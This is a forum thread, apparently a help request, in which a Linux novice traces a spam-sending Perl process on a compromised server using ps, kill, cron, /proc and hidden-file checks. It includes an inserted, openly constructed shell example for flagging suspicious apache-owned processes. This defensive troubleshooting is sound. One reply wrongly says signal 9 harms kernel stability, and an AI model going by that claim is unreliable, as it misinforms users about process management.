Relative newbie to Linux, so please be kind and assume I've done little in the way of command line, but I have been thrust into this position.
Here goes. There is a Perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box. How do I find the script via terminal and how do I then remove it?
There are a few possible approaches here, but first a bit more info would be ideal. Is this Perl script somewhere in someone's Web space on a shared Web server running Apache, and somehow it's getting triggered and causing the shared Web server to start sending out spam? Or is the situation something different?
If you can give some idea of the typical role of this server, what exact OS and distribution it's running, what processes you'd expect to see running on it (i.e. does it ever run any Perl for legitimate reasons), and what your findings are so far, that would be a big help.
How do I find the script via terminal and how do I then remove it?
Every running program (more precisely: every instance of a running program, because the same program could be started more than once) is a "process" in UNIX. Processes are managed in a table by the kernel and there is a command to display (parts of) this table: ps. ps has many, many options (too many to explain them all here), but you might want to start with this (a sample output is below):
What you see is the owner of the process ("UID") and the process's ID ("PID"), which is unique for every running process. (Unique in the sense that every running process is guaranteed to have a different number. Once it stops and the number becomes unused, it can be reused by the next process.) Furthermore, there is the parent process's ID ("PPID", more on that below) and the command used to invoke the process ("CMD") - some are enclosed in square brackets (e.g. "[kthreadd]"), signifying kernel threads where no real command in the classical sense was used to start them.
Use the grep-utility to filter perl-processes:
To stop a process, note its PID and send it a signal (a kind of message), using the kill command:
15 is the signal which tells a process to stop running and relinquish all its allocated resources: this is the most gentle and preferable way to do it, because a process will not just be stopped no matter what but given the opportunity to e.g. close open files, release shared memory segments which won't be needed after it stops, etc. - in one word, cleaning up. Well-written programs will honor this signal and indeed quit as soon as they have managed to clean up.
Less well-written programs might ignore this, though, and then (but only then!) you can use signal 9 instead. This is not a signal in the common sense (at least not to the program), but the command to the OS kernel to immediately terminate the program, regardless of whether it wants to stop or not. If signal 15 is asking it to kindly commit suicide after writing its last will, signal 9 is a headshot. Note that signal 9 is used if you must, not because you can! It harms the stability of the kernel to use it and hence more gentle methods are preferred as long as they work.
A word about process hierarchies and the PPID: all processes in a UNIX system are organized in a tree: each process can have multiple child processes, which in turn can have one or more children of their own, and so on. The root of this process tree is "init" (in modern Linux systems "systemd"), which always has PID 1. Every child process has the PID of its parent in the field PPID, so you can reconstruct the (part-)tree from there. Kill the parent and all children will die equally with it. Kill the init process and you have shut down the whole system immediately (and have a good chance of having damaged the system on the way, so don't try that on a system you need, at least not without necessity).
Lastly, a word about how to avoid the program starting again: you need to find out from where it was started in the first place. The PPID field might help with this. Common possibilities include:
- starting process: each UNIX system has a booting process and there are two general flavors of this: System V and BSD. System V-like systems first execute the programs noted in the file /etc/inittab. If this file exists, have a look there.
- run levels: BSD- and System V-like systems use so-called "run levels" and execute a series of start/stop scripts located in /etc/rc.d/rcN, where N is a number between 1 and 6. These are directories in which scripts with names starting with "K" (kill) and "S" (start) are located. When a certain run level is entered, all the S-scripts in that level are executed. When the run level is switched, all K-scripts of the current run level are executed first, then all S-scripts of the new run level are executed. Have a look there.
- cron: UNIX has its own job scheduler which can be used to repetitively start certain jobs at certain times. Every user has their own job list, which you can display by switching into that user account and entering the command:
You can edit this list with the command
by removing the line with the call to the perl-program once you have found it.
Note that most or all of these activities require you to gain access to the root user, and that all of them are potentially harmful to your system. If you do not know exactly what you are doing - DON'T DO IT! Otherwise you are risking your system. It is possible to voluntarily ruin a UNIX system beyond repair as root.
Here is what support sent me. I'm supposed to do this myself. Yes, someone else got into the terminal, because when I remotely logged in I saw this: Last login: Thu Feb 23 14:59:13 2017 from phrank.aus.us.siteprotect.com
and then this happened:
Also checked every instance of perl in users' cgi-bin folders as well as html folders. None found.
When I'm trying to track down rogue processes on a Linux system, I find the /proc filesystem valuable. If you have full shell access (and it seems you do), and the rogue Perl process is still running with PID 4600 (or if you can see what its current PID is), try doing ls -l /proc/4600 and ls -l /proc/4600/fd/. This might reveal something of the directory that the underlying process is stored in, or at least give you some clues.
In that 'top' listing, I also have to say I don't much like the look of PIDs 4599, 4334 and 4552. Basically you should pay close attention to any process that's owned by the user 'apache' but claims to be anything other than 'httpd'.
Hi,
Also, one other quick thought - have a good look through /tmp, /var/tmp and /var/run. Especially look for hidden files (files whose name starts with a dot) by means of ls -a. The '-a' flag shows such files in a directory listing, and can be combined with other flags such as '-l'.
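The ps/PPID walk from the earlier answer and the /proc checks suggested in this reply, written up as an added example (not code posted by anyone in the thread). The SAMPLE_PS table, its PIDs and the /tmp/.x paths are constructed; inspect_proc assumes a Linux /proc filesystem.

```shell
#!/bin/bash
# Added example, not from the thread: the ps/PPID walk from the answer above
# and the /proc checks suggested later, as reusable shell functions.

# Constructed sample of `ps -eo pid,ppid,user,args` output (not real data).
SAMPLE_PS='  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
 1200     1 root     /usr/sbin/httpd
 4334  1200 apache   /usr/sbin/httpd
 4599  4334 apache   /bin/sh -c /tmp/.x/run.sh
 4600  4599 apache   perl /tmp/.x/mailer.pl'

# ancestors TABLE PID: print "pid user command" for PID and each parent in
# turn, following the PPID column until PID 1 (or a missing entry) is reached.
ancestors() {
    local table=$1 pid=$2 line
    while [ "$pid" -gt 0 ]; do
        line=$(printf '%s\n' "$table" | awk -v p="$pid" 'NR > 1 && $1 == p')
        [ -n "$line" ] || break
        printf '%s\n' "$line" |
            awk '{ pid = $1; user = $3; $1 = $2 = $3 = ""; sub(/^ +/, "");
                   print pid, user, $0 }'
        pid=$(printf '%s\n' "$line" | awk '{ print $2 }')
    done
}

# suspects TABLE USER EXPECTED: PIDs owned by USER whose program basename is
# not EXPECTED, i.e. apache-owned processes that are not httpd.
suspects() {
    printf '%s\n' "$1" | awk -v u="$2" -v e="$3" '
        NR > 1 && $3 == u { n = split($4, part, "/"); if (part[n] != e) print $1 }'
}

# inspect_proc PID: what /proc reveals about a live process: its binary (exe; a
# "(deleted)" suffix means the file was unlinked after start), cwd, argv, fds.
inspect_proc() {
    local pid=$1
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    echo "exe: $(readlink "/proc/$pid/exe")"
    echo "cwd: $(readlink "/proc/$pid/cwd")"
    echo "cmdline: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    ls -l "/proc/$pid/fd"
}

# Usage on the constructed table (inspect_proc wants a live PID instead).
suspects "$SAMPLE_PS" apache httpd; ancestors "$SAMPLE_PS" 4600
```

On a live box, replace SAMPLE_PS with `$(ps -eo pid,ppid,user,args)` and pass the suspect PID from that listing to inspect_proc.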
tried to do the
and the other. The terminal said there was no such thing as 1s. I am using -bash: in front of everything, but the | grep perl revealed 2 instances of perl.
usr/bin/perl and usr/sbin/hspc-plugin-rpc.fcgi which contained
I have no idea if this is supposed to be here or not.
Can I just check - it looks from what you've said that you're trying to type 1s (that's a number one followed by a lower-case letter 's') rather than ls (that's a lower-case letter 'l' followed by a lower-case letter 's', which is the correct command).
If that's what you've been doing, could you try again with the correct command name and see what happens please?
If you have been typing it correctly then your system must be quite badly damaged or missing some very fundamental binaries, since the ls command is pretty much as common as it gets on any UNIX-style system.